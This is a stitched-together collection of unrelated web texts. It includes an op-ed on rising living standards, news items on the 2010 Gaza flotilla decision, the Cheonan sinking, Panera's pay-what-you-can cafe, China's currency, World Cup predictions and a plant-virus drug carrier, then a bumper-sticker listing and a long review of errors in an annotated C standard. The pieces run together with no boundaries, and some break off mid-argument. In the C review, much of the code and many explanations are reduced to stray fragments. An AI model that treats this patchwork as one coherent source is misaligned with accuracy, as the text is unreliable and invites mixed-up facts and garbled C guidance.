Although there are many environmental issues yet to be solved , too many species endangered , more pollution than most of us would like and far too many people still going hungry each day , let ’s not forget how far we ’ve come , starting 10,000 years ago .
Before that time , all people lived as hunter - gatherers in relative poverty compared with today .
How poor were they ?
If you walk into a Yanomamö village in Brazil today — a good analogue for how our ancestors lived — and count up the stone tools , baskets , arrow points , arrow shafts , bows , hammocks , clay pots , assorted other tools , various medicinal remedies , pets , food products , articles of clothing and the like , you would end up with a figure of about 300 .
Before 10,000 years ago , this was the approximate material wealth of each village on the planet .
By contrast , if you walk into the Manhattan village today and count up all the different products available at retail stores and restaurants , factory outlets and superstores , you would end up with an estimated figure of about 10 billion ( based on the UPC bar code system count ) .
Economic anthropologists estimate the average annual income of hunter - gatherers to have been about $ 100 per person and the average annual income of big -city dwellers to be about $ 40,000 per person .
If ever there was a great leap forward , this is evidence of it .
It has been estimated by Eric Beinhocker in his book , “ The Origin of Wealth , ” that the $ 100 - per- person annual income rose to only about $ 150 per person by 1000 BC and did not exceed $ 200 per person until after 1750 and the onset of the Industrial Revolution .
Today the average is $ 6,600 per person per year for the entire world .
Of course , the magnitude of the increase is much higher for the wealthiest people in the richest nations .
As Gregg Easterbrook shows in “ The Progress Paradox , ” over the last 50 years , standards of living have risen dramatically .
The 1950 gross domestic product per capita , computed in 1996 dollars , was only $ 11,087 , compared with the 2000 figure of $ 34,365 .
And more people are moving up the economic hierarchy .
Way up .
In 2000 , 1 in 4 Americans earned at least $ 75,000 a year , putting them in the upper middle class , compared with 1890 , when only 1 % earned the equivalent of that figure .
That is a 25 - fold expansion of the upper middle class , redrawing class boundaries and redefining what it means to be average .
And rich .
Since 1980 , the percentage of people earning $ 100,000 or more per year , in today ’s dollars , has doubled .
What we can buy with that money has also grown significantly .
A McDonald ’s cheeseburger cost 30 minutes of work in the 1950s , three minutes of work today , and in 2002 , Americans bought 50 % more healthcare coverage per person than they did in 1982 .
We also have more material goods — SUVs , DVDs , PCs , TVs , designer clothes , name - brand jewelry , home appliances and gadgets of all kinds .
The homes in which we keep all of our goodies have doubled in size in just the last half a century , from about 1,100 square feet in the 1950s to more than 2,200 square feet today .
And 95 % of these homes have central heating , compared with 15 % a century ago , and 78 % have air conditioning , compared with the number in our grandparents ’ generation — zip .
That ’s not all .
Crime is down .
Most crime rates everywhere tumbled throughout the 1990s .
Easterbrook found that homicides , for example , plummeted between 50 % and 75 % in major cities such as New York , Los Angeles , Boston , Baltimore and San Diego .
Domestic violence against women dropped 21 % , while teen criminal acts fell by more than 66 % .
Americans also now enjoy a shorter workweek , with the total hours of life spent working steadily declining for the last 15 decades .
In the mid-19th century , for example , the average person invested 50 % of his waking hours in the year working , compared with a mere 20 % before the current recession .
Fewer working hours translates into more leisure time .
In 1880 , the average American enjoyed just 11 hours per week in leisure time , compared with the 40 hours per week average today .
And those working environments are cleaner , safer and more pleasant .
And despite the environmental impact of our more prosperous lifestyle , on balance things really are getting better , as documented by Matt Ridley in his forthcoming book , “ The Rational Optimist . ”
For instance , over the last half a century , pollution is down in most cities , even in my own Los Angeles .
When I took up bicycle racing in 1979 , the air was so bad that summer training rides had to be completed well before noon to avoid the pain caused by fine particulate matter — dirt , dust , mold , ash , soot , aerosols , carbon dioxide , sulfur dioxide and nitrogen oxides — becoming deeply embedded in your lungs .
Today , I can ride practically any time of the day on most days of the year and feel no ill effects .
Despite the American Lung Assn.'s report this week that L.A. is the smoggiest city in America , thanks to the Clean Air Act and improved engine and fuel technologies , the trend line has been and continues to be moving in the direction of cleaner air .
In fact , according to the South Coast Air Quality Management District , during the 1980s L.A. averaged 150 “ health advisory ” days per year and 50 “ stage one ” ozone alerts , but in 2000 there were only 20 health advisory days and zero stage one ozone alerts .
Given these facts , and many more quantitative measures , it would be perfectly sane to decline a trip in a time machine to any point in the past if you had to actually live out your life there .
These are the good old days , and without neglecting problems that still need solving , it ’s high time we recognized that it is a better life for more people in more places more of the time .
Michael Shermer , publisher of Skeptic magazine and a monthly columnist for Scientific American , is an adjunct professor at Claremont Graduate University and the author of “ The Mind of the Market . ”
Senior ministers have been sharply critical of the fact that the decision to seize control of the flotilla to Gaza was made after two meetings of the forum of seven senior ministers but without official deliberation by the inner cabinet , the body that has the authority to approve military actions of this scale .
Open gallery view Prime Minister Netanyahu arriving on Parliament Hill in Ottawa on Monday for a meeting with Canadian PM Stephen Harper .
Credit : AFP
Prime Minister Benjamin Netanyahu is due to return to Israel this morning from the United States , after canceling his scheduled meeting with President Barack Obama in Washington .
He has convened the inner cabinet for 4 P.M. to discuss the implications of Monday 's military operation .
Senior ministers have noted that , in contrast to the handling of similar incidents in the past , the inner cabinet did not discuss issues related to the flotilla , receive operational briefings or approve the operation .
The forum of seven , which did consider and approve the plan , is a consultative body only and does not have the legal authority to pass resolutions .
The forum - Netanyahu , Defense Minister Ehud Barak , Foreign Minister Avigdor Lieberman , Intelligence and Atomic Affairs Minister Dan Meridor , Strategic Affairs Minister Moshe Ya'alon , Interior Minister Eli Yishai and Minster without Portfolio Benny Begin - held just two meetings on the flotilla , the latest on Wednesday .
They approved the operation and the continuation of the Israeli policy of barring ships from docking in Gaza .
Much of the session was devoted not to the military operation but rather to media and public relations issues surrounding the issue .
" The ministers who attended the meeting did n't get the impression from the defense establishment that a violent confrontation of this scope was likely , " one senior Jerusalem official said .
" The sense during the discussion was that the navy would come and the organizers would take fright , do an about - face and flee , " he said .
According to senior officials who attended the session , a few ministers expressed differing views but in the end a consensus was reached and there was not even a vote .
One of the most vocal participants in Wednesday 's session was Cabinet Secretary Zvi Hauser .
He was against the raid and said the ships should be allowed to dock in Gaza in order to avoid a diplomatic and public relations crisis as well as the embarrassment to Israel that a violent confrontation with demonstrators on the ships could cause .
After senior defense officials expressed their opposition to Hauser 's views , his position was rejected .
About Dig In
Thanks to everyone who took part in the Dig In campaign throughout 2009 and 2010 .
We hope you enjoyed growing the Dig In seeds , especially those of you who are new to growing vegetables .
This site is no longer being updated , but it is still packed full of useful information .
England 's John Terry ( 2nd L ) , Frank Lampard ( 4th L ) , manager Fabio Capello ( 5th L ) and Wayne Rooney ( 2nd R ) attend a team training session in London Colney , north of London November 10 , 2009 .
England are due to play Brazil in an international friendly soccer match in Qatar on Saturday .
REUTERS / Eddie Keogh
LONDON ( Reuters ) - England will finally win the World Cup after 44 years of pain if City boffins are to be believed .
European champions
Spain will be runners - up with the Netherlands winning the third place play - off , according to J.P. Morgan quantitative analysts who issued their findings on Tuesday ahead of the World Cup ( June 11 - July 11 ) kick - off .
They predict world number one team Brazil will fall short in South Africa because of a tougher route through to the final than their main rivals .
The quantitative analysts at J.P. Morgan used information such as FIFA ranking , historical results and its J.P. Morgan Team Strength Indicator to come up with a mathematical model to predict match results , they explained .
However , they warned “ this report should be taken with a pinch of salt ” and that it is an exercise to “ light - heartedly explain quantitative techniques and demystify the typical quant framework . ”
The analysts usually use these kind of mathematical models to help predict stock market winners with millions of dollars hanging on their calculations .
England last won football ’s biggest prize in 1966 when the Beatles topped the charts with Yellow Submarine and Harold Wilson was Prime Minister .
In the latest official FIFA rankings , England were in eighth position and Spain were second .
American manufacturer BFG
Technologies has announced that it will cease to produce graphics cards effective immediately .
The company , based out of Illinois , USA , is best known for producing overclocked NVIDIA graphics cards and has done so for the best part of a decade .
BFG has yet to disclose the reasons behind its exit from the graphics marketplace , but Internet gossip is already pointing its collective finger at a lack of interest surrounding NVIDIA 's most recent launch ; the GeForce GTX 400 series .
Looking ahead , BFG has stated that it will turn its attention a range of power supplies and computers systems - including the company 's Deimos line of notebooks and Phobos line of extreme gaming desktops .
Hoping to ease the fears of existing customers , the manufacturer adds that it will " continue to offer RMA , telephone and email support for qualified BFG Tech graphics card warranty holders . "
• Maradona to consult Mourinho over tactics • Messi ready to end comparisons with me , says Maradona
This article is more than 10 years old
This article is more than 10 years old
Diego Maradona says he may turn to José Mourinho for managerial tips as he prepares Argentina for the World Cup 's knockout stages .
The Argentina manager said he keeps Mourinho 's telephone number " on his bedside " and that he has asked the Portuguese for tactical advice in the past .
" I like Mourinho a lot .
I 've got his phone number , I might call him , " Maradona said .
" We spent hours talking about football , attacking and defensive tactics .
He seemed to me a guy to take to your bedside table and ask him each time you need something . "
Maradona would , however , prefer that his team do not adopt the kind of safety - first tactics that Mourinho used win the European Cup with Internazionale last month .
" No , not that .
But it worked for him , right ?
He won the Champions League , " he said .
Maradona added that Lionel Messi , who turned 23 today , was by some distance the best player at this World Cup .
" I have not seen a player at this World Cup who is even 30 % [ as good as ] Messi , " he said .
" Maybe I will be called arrogant but I 've not even seen a player who is 30 % of Carlitos [ Carlos Tevez ] .
I love my team . "
Maradona believes Messi is ready to end comparisons between them .
" I think he 's there , " said the 1986 World Cup winner .
" I believe he 's broken the mould and is ready , let 's end the comparisons .
Leo is ready to go out on to a pitch and leave it [ the tournament ] with the crown . "
" Making Messi happy is everyone 's pride , including his team - mates ' .
Because today you see Messi pulling a joke on [ Javier ] Pastore , on [ Ariel ]
Garcé and he has never met them before in his life .
" And he talks to [ Juan Sebastián ] Verón and I spy on them : La Bruja [ the Witch ] is an intellectual of football , because he knows much more of football than Leo , but they start talking about it and the bastard answers back . "
Today was day one of our two day visit with the Ford Motor Company .
Tonight ’s agenda was just about mingling and eating dinner with other people from other publications .
While we were busy talking and “ noming ” , two cars drove up onto the grassy courtyard behind everyone .
One was the upcoming 2011 Ford Fiesta and the other was a car none of us had ever seen before .
After we finished dinner , Jordan and I broke out the cameras and got to work .
What we were looking at was the Ford “ Start ” .
A brand new concept car that looked like something only a Cylon would create .
It looked very sleek and sexy and would definitely turns heads .
As for a geek take on the car , it has a lot of buttons to play with as well as a touch screen right above the stick shift .
I could easily imagine myself pretending to punch in “ jump coordinates ” to my house on the touch screen , dropping the car into first gear and peeling out .
LUDICROUS SPEED .
GO !
We were told by Ford Designer , Jeff Nield , that this was the first time the Ford “ Start ” was shown in the US .
It was unveiled in Beijing , China 3 weeks prior .
We were also told a little bit about the MyFord Touch technology that we will be seeing tomorrow .
For more pictures of the Ford “ Start ” concept car , go past the break .
This post is part of our 2 day visit with Ford Motor Company
Absent from screens since 2003 ’s The League Of Extraordinary Gentlemen , Sir Sean Connery — like many actors before him — seemed to have ended his career with a slow ebb , gradually realizing that gallivanting around in comic - book movies and shouting , “ You ’re the man now , dog ! ” at black teenagers was no way to spend his august years .
It was a regrettable yet graceful exit , and unfortunately only one of those adjectives applies to Sir Billi , Connery ’s forthcoming return to movies .
As you can see from the promo reel below , Connery has provided the voice for a creepy animated grandpa who ’s tasked with saving a couple of beavers from drowning for some reason .
Assisting him on his quest is his tracksuit - wearing pet goat ( played by Alan Cumming ) , prompting the tagline , “ “ Can this octogenarian and his goat save the day ? ”
Oh , and at one point , Connery ’s character rides a skateboard ; at no point does this make any sense .
[ HT to / Film ]
UPDATE : Since some readers have clung to the possibility that this is a fake , here 's an interview with Connery about the project , offered with our sincerest apologies .
For the first time , scientists have succeeded in growing empty particles derived from a plant virus and have made them carry useful chemicals .
The external surface of these nano containers could be decorated with molecules that guide them to where they are needed in the body , before the chemical load is discharged to exert its effect on diseased cells .
The containers are particles of the Cowpea mosaic virus , which is ideally suited for designing biomaterial at the nanoscale .
" This is a shot in the arm for all Cowpea mosaic virus technology , " says Professor George Lomonossoff of the John Innes Centre , one of the authors on a paper to be published in the specialised nanotechnology scientific journal , Small .
Scientists have previously tried to empty virus particles of their genetic material using irradiation or chemical treatment .
Though successful in rendering the particles non-infectious , these methods have not fully emptied the particles .
Scientists at the John Innes Centre , funded by the BBSRC and the John Innes Foundation , discovered they could assemble empty particles from precursors in plants and then extract them to insert chemicals of interest .
Scientists at JIC and elsewhere had also previously managed to decorate the surface of virus particles with useful molecules .
" But now we can load them too , creating fancy chemical containers , " says lead author Dr Dave Evans .
" This brings a huge change to the whole technology and opens up new areas of research , " says Prof Lomonossoff .
" We do n't really know all the potential applications yet because such particles have not been available before .
There is no history of them . "
One application could be in cancer treatment .
Integrins are molecules that appear on cancer cells .
The virus particles could be coated externally with peptides that bind to integrins .
This would mean the particles seek out cancer cells to the exclusion of healthy cells .
Once bound to the cancer cell , the virus particle would release an anti-cancer agent that has been carried as an internal cargo .
Some current drugs damage healthy cells as well as the cancer , leading to hair loss and other side effects .
This technology could deliver the drug in a more targeted way .
" The potential for developing Cowpea mosaic virus as a targeted delivery agent of therapeutics is now a reality , " says Dr Evans .
The empty viral particles , their use , and the processes by which they are made , are the subject of a new patent filing .
Management of the patent and commercialisation of the technology is being handled by PBL .
Apple almost went out of business 14 years ago , and many would have blamed what seemed one of the seminal business blunders in history .
Bill Gates was chatting with students at Stanford at the time and recalled letters he 'd written to Steve Jobs begging him to allow cloning of Apple hardware .
Had Mr. Jobs complied , Apple 's operating system might have become the de facto universal standard , the one everybody wrote software for — a role that fell to Windows instead .
Google may not be Microsoft , exactly :
For one thing , Google is giving away its smartphone operating system , known as Android , for free .
Nor will the battle yield a similar winner - take - all outcome .
But otherwise the effects are likely to be the same .
The Cheonan sank after an as yet unexplained blast on 26 March South Korea 's defence minister has said those responsible for the deaths of 46 sailors on board a warship that sank after an explosion must " pay a price " .
Kim Tae - young promised " punitive action " against " the perpetrators who killed our soldiers . "
He did not specify what form this could take .
South Korea has not directly blamed North Korea - and Pyongyang has denied any role .
The Cheonan sank after a " close - range " blast that split it in two .
Last month , a mass funeral was held for the 46 sailors , including six whose bodies have not been recovered .
Aluminium fragments Many South Koreans believe North Korea sank the ship , correspondents say .
We should deal some kind of blow against those forces which made our officers and men sacrifice their lives
Kim Tae - young
South Korean Defence Minister
What if North Korea was to blame ?
The ship has been salvaged from the sea bed and is being examined by an international team of naval experts trying to find out what caused it to sink close to the North Korean border on 26 March .
The South Korean defence minister has said a torpedo strike is among the most likely causes .
So far the investigation team has said only that they have found evidence of an underwater explosion and it is not known whether fragments of any weapon have been discovered .
Mr Kim said officials were scrutinising pieces of aluminium , a key material in making a torpedo , that were picked up from the disaster area .
" I believe that , by thoroughly and completely getting to the bottom of the incident to the maximum extent possible , we should deal some kind of blow against those forces which made our officers and men sacrifice their lives for their country , " the defence minister said on KBS television .
North and South Korea are still technically at war , since the 1950 - 53 conflict ended without a peace treaty .
Over the years there have been several naval clashes off the west coast of the peninsula , in the area where the Cheonan went down .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Enlarge By Tim A. Parker for USA TODAY Panera 's first nonprofit restaurant where people paid what they could has been a success so the company plans to open more .
Chairman Ron Shaich said the chain is a challenge to other corporations to push their philanthropy beyond writing checks .
Enlarge By Tim A. Parker for USA TODAY Panera Cares community cafes offer suggested pricing for Panera fare and individuals can pay that , more or nothing at all .
CLAYTON , Mo. 
As the first crowd of customers filed into Panera 's nonprofit restaurant here , only the honor system kept them from taking all the food they wanted for free .
Ronald Shaich , Panera 's chairman , admitted as he watched them line up that he had no idea if his experiment would work .
The idea for Panera 's first nonprofit restaurant was to open an eatery where people paid what they could .
The richer could pay full price — or extra .
The poorer could get a cheap or even free meal .
A month later , the verdict is in :
It turns out people are basically good .
Panera , which operates 1,400 franchised and corporate - owned bakery - cafes across the country , plans to expand the nonprofit model around the nation , opening two more locations within months .
" I guess I would say it 's performing better than we even might have hoped in our cynical moments , and it 's living up to our best sense of humanity , " Shaich said in an interview .
Its cashiers tell customers their orders ' " suggested " price based on the menu .
About 60 % to 70 % pay in full , Shaich said .
About 15 % leave a little more and another 15 % pay less , or nothing at all .
A handful have left big donations , like $ 20 for a cup of coffee .
The restaurant took in $ 100,000 in revenue its first month .
He declined to say what kind of margin this left between total costs and revenue , but he predicted the restaurant will be able to cover its costs within months and eventually generate extra cash for charitable programs .
Panera 's nonprofit plan is the largest example yet of a concept called community kitchens , where businesses operate partly as charities .
Customers who need a discount , or even free food , can get it with no questions asked .
Shaich borrowed the idea from a restaurant in Denver and then connected with Denise Cerreta , who runs The One World Salt Lake City restaurant with a sliding scale menu .
Cerreta 's community kitchen and others he looked into were impressive , Shaich said , but operated on a smaller scale than Panera could afford to run .
The Clayton store is run under the company 's St. Louis Bread Co. banner by a nonprofit organization called Panera Cares that publicly traded Panera Co. supports .
But Panera wo n't bear the nonprofit 's losses if the experiment fails .
For the expansion , Panera spokeswoman Kate Antonacci said , the nonprofit is considering locations that , like Clayton , are upscale but accessible to lower - income customers .
In Clayton 's case , St. Louis County 's offices and court house are nearby .
The Clayton Panera has hardly turned into a soup kitchen .
Its longtime business clientele kept the lunch hour busy last week , with well - dressed workers clustered around laptops and talking on cellphones .
Financial adviser Jeff
White , 34 , said he was a regular at the location before it closed and reopened as the nonprofit in late May and has n't changed his dining habits .
White said he usually rounds up when he pays his tab , because he wants the " intriguing " experiment to succeed .
But there were new customers — drawn to the bargains .
Anna and Bennie Ward heard about the pay - what - you - wish model on the news .
Anna thought it was too good to be true , so she researched it on the Internet before driving over for lunch with Bennie their two kids .
It was a rare chance for the couple to dine out , Anna said .
Bennie is laid off and her only income is from disability checks .
The family ordered sandwiches , iced coffee drinks and bread to go .
" Near the end of the month is difficult for us .
If it was not for help from friends and community , I do n't know where we would get our last meal , " Anna Ward said after the meal .
" To be able to go there and eat an actual meal and feel full is such a blessing . "
Shaich had moments of doubt during the restaurant 's first weeks , including when a teenager bought $ 40 worth of sandwiches to go and put just a few dollars on a credit card .
" You get a little bummed out , and you wonder whether people will get it , " he said .
To control freeloaders , signs remind customers that " You 're on your honor . "
Workers stationed at the door , who explain the concept to customers , told a group of teenagers who ate there last week that the store is " not a handout . "
Shaich said the nonprofit chain is a challenge to other corporations to push their philanthropy beyond writing checks .
More valuable , he said , is to put their supply chains , technology and knowledge to use .
" The fascinating question to me is : Can we take our skills — our core competencies , as we call them in business — and apply them very directly to solving some of the problems " in society , he said .
" And not just for publicity , but to make a difference . "
Copyright 2010 The Associated Press .
All rights reserved .
This material may not be published , broadcast , rewritten or redistributed .
Guidelines :
You share in the USA TODAY community , so please keep your comments smart and civil .
Do n't attack other readers personally , and keep your language decent .
Use the " Report Abuse " button to make a difference .
You share in the USA TODAY community , so please keep your comments smart and civil .
Do n't attack other readers personally , and keep your language decent .
Use the " Report Abuse " button to make a difference .
Read more
China ’s central bank said Saturday that it would permit more flexibility in the nation ’s currency — a move that suggested the country was ready to raise its exchange rate modestly against the dollar .
In a statement posted on its website , the People ’s Bank of China said the decision was prompted by recoveries in both the global and Chinese economies .
President Obama welcomed the news .
“ China ’s decision to increase the flexibility of its exchange rate is a constructive step that can help safeguard the recovery and contribute to a more balanced global economy , ” he said in a statement .
U.S. Treasury Secretary Timothy F. Geithner called the move an “ important step . ”
But he added , “ The test will be how far and how fast they let the currency appreciate . ”
Advertisement
China ’s currency , known as both the yuan and renminbi , has been pegged at around 6.83 to the dollar since the outbreak of the financial crisis in 2008 .
“ The global economy is gradually recovering , ” the central bank said .
“ The recovery and upturn of the Chinese economy has become more solid with the enhanced economic stability .
It is desirable to proceed further with reform of the [ yuan ] exchange rate regime and increase the [ yuan ] exchange rate flexibility . ”
The yuan ’s link to the dollar the last two years has exacerbated an already tense relationship between Beijing and trade competitors such as the United States that believe the Chinese currency is undervalued by over 25 % to make Chinese exports artificially cheap .
Chinese officials have persistently rejected the charges , likening criticism of their exchange rate policy to attacks on sovereignty .
Complicating any Chinese move to appreciate the yuan will be the perception that Beijing has bowed to international pressure .
Advertisement
Many analysts have predicted about a 3 % increase against the dollar this year to combat inflation .
China ’s economy is flush with excess liquidity after a record amount of new bank lending was approved during the worst of the financial crisis .
“ A more flexible [ currency ] will be welcomed by some of China ’s critics .
But it is clearly unlikely to appease those calling for large revaluation , ” said Ben Simpfendorfer , chief China economist for the Royal Bank of Scotland .
“ Tensions will accordingly persist , especially heading into the U.S. November elections , and should Europe ’s economic woes worsen . ”
david.pierson@latimes
Pat Robertson Quote - Feminism encourages women St $ 4.99 Color : White Clear Qty : AVAILABILITY : Product Number : 030-59138443 Share | Product Information
Express yourself and make it stick !
Our durable bumper stickers are perfect for showcasing your humor , political views , causes , beliefs , and your overall awesome personality .
Express yourself and make it stick !
Our durable bumper stickers are perfect for showcasing your humor , political views , causes , beliefs , and your overall awesome personality .
The Annotated Annotated C Standard
C.D.W.
Feather
This is a review of The Annotated ANSI C Standard , annotated by Herbert Schildt .
This review is made possible by the generosity of Raymond Chen < raymondc@microsoft.com > , who provided the review copy of the book , and is dedicated to the Dream Inn , Santa Cruz , CA , whose staff supplied uncounted cups of coffee while I wrote this review .
This version was modified on 1995 - 03 - 03 .
Thanks to the following for pointing out errors :
Stan Brown < brown@ncoast.org >
Jutta Degener < jutta@pobox.com >
Mark - Jason Dominus < mjd@saul.cis.upenn.edu >
Sue Meloy < suem@hprpcd.rose.hp.com >
Christopher R Volpe < volpe@ausable.crd.ge.com >
Alan Watson < alan@bernie.sal.wisc.edu >
Introduction
Since The Annotated ANSI C Standard first appeared , many people have commented on errors in the book .
After reading several of these , I obtained a copy of the book and have read it in its entirety .
Many of these comments might appear to be relatively trivial .
In response to this , I can only point out that the book is commenting on a very carefully designed document , and one that has to be read precisely .
If the annotator cannot get things right , then the book is not just useless , but is a positive danger to those who do not have the time to read and analyse every word of the standard .
In other contexts , such as a tutorial on C , some of the errors in this book could be allowed to pass , but not in this .
When I state that no mention is made of a topic , this indicates that I feel that the topic is at least as important as ones that were commented on ; quite often this refers to the features of the standard which are less easy to understand .
Text quoted directly from the book is indicated by ## in the left margin .
General comments
Quite often , the book gives the impression that annotations were omitted because they could n't be fitted into the format of " standard on the left , comments on the right " .
Whilst many pages of the standard have no annotations at all , there are no pages with annotation but no standard .
I note at least one case below where I believe that a function was not annotated because the comments on the previous section took up too much space .
The front cover of the book shows , amongst much clutter and someone 's half - eaten muffin , page 147 of the standard .
It is intriguing to note that , not only is this the obsolete ANSI standard rather than the ISO standard , but that it corresponds to half of page 146 in the book .
The major divisions of the standard are referred to as " Part 1 " , " Part 2 " , etc .
In actual fact , they are " clause 1 " , " clause 2 " , and so on .
One has to wonder about an author who can't even get that right .
For a year after first writing this review , I believed that at least the left hand pages ( the extracts of the Standard ) were correct .
It turns out that even this is n't the case !
[ See 6.1.3.1 . ]
Specific comments
Numbers at the start of each comment are the ISO subclause numbers of Schildt 's annotations , which are not always the same as the subclause actually being annotated .
Introduction
3.10 , 3.16 , 3.17
3.13
## However , this limits the total character set to 255 characters .
3.14
## An object is either a variable or a constant that resides at a
## physical memory address .
5.1.1.3
##
The standard requires that a compiler issue error messages when
## an error in the source code is encountered .
5.1.2.2
## You are therefore free to declare main ( ) as required by your
## program .
void main ( void )
struct foo { int i ; double d ; } main ( double argc , struct foo argv )
Most of the examples in the book declare main ( ) as void .
I wo n't bother to point them out individually .
5.1.2.2.1
## Though most compilers will automatically return 0 when no other
## return value is specified ( even when main ( ) is declared as
## void ) , you should not rely on this fact because it is not
## guaranteed by the standard .
main ( )
void
5.1.2.3
5.2.1.2
## Therefore , a multibyte character is a character that requires
## more than one byte .
## First , the null character may not be used except in the first
## byte of a multibyte sequence .
strcpy
There was an opportunity here to explain multibyte characters and how to use them , something that most books omit .
Unfortunately , this one omits it as well .
5.2.3
## In other words , one copy of a library function in memory may
## not be used by two or more currently executing programs .
What this section of the standard is talking about is re-entrancy .
The functions in the library are not re-entrant , and so may not be called from within themselves .
For example :
qsort ( ) cannot be called from within the compare function passed to qsort ( ) ;
cannot be called from within the compare function passed to if a signal can be raised within a library function ( perhaps by an external event such as the user pressing a BREAK key ) , then the signal handler must not call that library function .
malloc
malloc
5.2.4.1
## A compound statement is a block of code .
5.2.4.2
## First , notice that a character is defined as 8 bits ( 1 byte ) .
## All other types may vary in size , but in C a character is always
## 1 byte long .
The assumption that 1 byte = 8 bits occurs at several other points in the book .
I wo n't always bother to point it out .
6.1
6.1.1
## No other keywords are allowed in a conforming program .
Of course , no other keywords are allowed in a strictly conforming program .
6.1.2
6.1.2.1
## * File scope begins with the beginning of the file and ends with
## the end of the file
## * Block scope begins with the opening { of a block and ends with
## its associated closing } .
/* Line 1 */ { /* Line 2 */ int i = 10 ; /* Line 3 */ { /* Line 4 */ int j = i ; /* Line 5 */ int i = 5 ; /* Line 6 */ printf ( " i = %d , j = %d
" , i , j ) ; /* Line 7 */ } /* Line 8 */ }
In particular , the " i " on line 4 refers to the one in the outer block , and so j has the value 10 , not 5 .
6.1.2.2
## Identifiers with external linkage are accessible by your entire
## program
6.1.2.3
6.1.2.5
## An unsigned integer expression cannot overflow .
This is because
## there is no way to represent such an overflow as an unsigned
## quantity .
UINT_MAX+1
unsigned int
ULONG_MAX+1
unsigned long
## fractional - constant :
## digit - sequence [ opt ] .
digit - sequence
## digit - sequence
6.1.3.4
## x = ' A ' ; /* give x the value 65 */
This , plus the comments assuming 8 - bit bytes , and use of the terms " high byte " and " low byte " of integers later on , makes me wonder whether a better title for the book is :
The ANSI C Standard annotated for some MSDOS compilers :-) .
6.1.4
## In other words , the executable version of a C program contains
## a table that contains the string literals used by the program .
## Further , the effect of changing the string literal table is
## implementation dependent .
The best practice is to avoid
## altering the string table .
6.2.1.2
##
In the most general terms , when you convert from a larger
## integer type to a smaller type , high - order bytes are lost .
A simpler way to state what this section means is :
If the source value can be represented in the destination type , it is unaltered .
Otherwise , if the destination type is unsigned , reduce the value modulo U< type > _MAX+1 .
Otherwise the destination type is signed and the value is implementation defined .
6.2.1.4
## When converting a larger [ floating ] type into a smaller one , if
## the value cannot be represented , information content may be lost .
6.2.1.5
## these automatic conversions are also intuitive .
6.2.2.1
## First , an array name without an index is a pointer to the first
## element of the array and is not an lvalue .
6.2.2.3
6.3
##
The standard states that when an expression is evaluated , each
## object 's value is modified only once .
In theory , this
## means the compiler will not physically change the value of a
## variable in memory until the entire expression has been
## evaluated .
In practice , however , you may not want to rely
## on this .
i = ++i + 1
i += 2
As anyone who has survived the " i = i++ " thread on comp.lang .c knows , this is not only nonsense , but dangerous nonsense .
The correct way to discuss this part of the standard is to point out what can and can't be done in a strictly conforming program , and leave it at that .
Suggesting that such code can ever have a defined answer is asking for trouble .
##
The rest of this section formally defined what type of lvalue
## can refer to an object .
char * cp ; int * ip ; void f ( double * d ) { *d = 3.14159 ; * cp = 1 ; * ip = 2 ; }
* cp
*d
* ip
*d
* ip
6.3.2.2
## When no prototype for a function exists , it is not an error if
## the types and / or number of parameters and arguments differ .
##
The reason for this seemingly strange rule is to provide
## compatibility with older C programs in which prototypes do not
## exist .
6.3.2.3
6.3.6
6.3.7
## When right - shifting a negative value , generally , ones are
## shifted in ( thus preserving the sign bit ) , but this is
## implementation dependent .
6.3.13
6.3.16.2
+=
a += b
a = a + b
* a++ *= 2
* a++ = *a++ * 2
6.3.17
6.5
##
In simple language , a declarator is the name of the object being
## declared .
static int * p [ 5 ] ;
* p[ 5 ]
6.5.1
## A variable declared using extern is not a definition .
extern int count = 10 ;
##
In essence , a static local variable is a global variable with
## its scope restricted to a single function .
## When static is applied to a global variable or function , it
## causes that variable or function to have file scope
static
static
##
The register specifier is only a request to the compiler , which
## may be completely ignored .
register
6.5.2.1
## This padding must occur at the end , not at the beginning , of the
## object .
6.5.3
## ( Many compilers display a warning about this fragment , but still
## accept it . )
## const int i = 10 ;
## int *p ;
## p = &i ;
## *p = 0 ; /* modify a const object through p */
6.5.4
## The information and constraints in this section are mostly
## applicable to compiler implementors .
6.5.4.3
6.5.5
unsigned char * v [ 5 ] ;
unsigned char *[ 5 ] ;
6.5.7
## The general form of an initialization is
## type var = initializer ;
int a [ 5 ] = { 1 , 2 , 3 , 4 , 5 } ;
6.6.4.2
default
break
I would also have appreciated a warning that ordinary labels are still allowed within the body of a switch statement , so :
switch ( i ) { /* ... */ defualt : j = 0 ; break ; }
6.7.1
##
To understand the difference between the modern and old forms ,
## here is the same function defined using both forms :
##
## /* Modern function definition . */
## float f ( int a , char c )
## {
## /* ... */
## }
## /*
Old - form function definition .
*/
## float f ( a , c )
## int a ;
## char c ;
## {
## /* ... */
## }
Unfortunately , these two are n't exactly the same .
With the modern function definition , the argument corresponding to c is converted to type char and passed to the function .
With the old - form definition , it is converted to int , passed to the function as an int , and then converted to char .
Why does this matter , you may ask ?
Well , it matters when we 're trying to write a prototype for the function .
The prototype for the new form definition is :
float f ( int a , char c ) ;
float f ( int a , int c ) ;
6.8.2
##
The #include statement has these two forms :
6.8.3
printf ( " %d " , ABS ( ( ( - 20 ) < 0 ? -( - 20 ) : ( - 20 ) ) ) ;
printf ( " %d " , ( ( - 20 ) < 0 ? -( - 20 ) : ( - 20 ) ) ) ;
6.8.6
# pragma
#ifdef
7.1.2
## All conforming C compilers will supply all of the functions
## described here .
7.1.3
## Frankly , many C programmers are not aware of the rules described
## in this section .
7.1.4
## If errno is zero , then no error has been detected .
7.1.6
offsetof ( )
offsetof ( )
7.3
## x is alphanumeric
7.4.1.1
## The setlocale ( ) function sets all or a specified portion of
## those items described in the lconv structure
setlocale ( )
strcoll ( )
lconv
7.6
setjmp ( )
## result = setjmp ( jumpbuf ) ;
setjmp
while ( setjmp ( jumpbuf ) ) while ( setjmp ( jumpbuf ) < 42 ) while (! setjmp ( jumpbuf ) ) setjmp ( jumpbuf ) ;
while
if
switch
for
The standard also puts limitations on what can be done with local variables in functions that call setjmp ( ) .
I am surprised to find no mention of these limitations at all .
7.7
sig_atomic_t
7.9
##
The type fpos_t is some type of an unsigned integer .
fpos_t
unsigned long
fpos_t
7.9.2
## Thus , it is permissible for a text stream to treat all
## characters as part of one long , uninterrupted line , if it
## so chooses .
The standard states that an implementation may treat spaces at the end of lines in text files specially , and may add and remove zero bytes at the end of binary files .
Neither of these rules are mentioned .
7.9.5.2
fflush ( NULL )
fflush
7.9.6.1
## Note that if stream is a pointer to stdout ,
stdout
stream
Here , and in many other places , printf ( ) is called with a format of " %lf " and a corresponding argument which is a double .
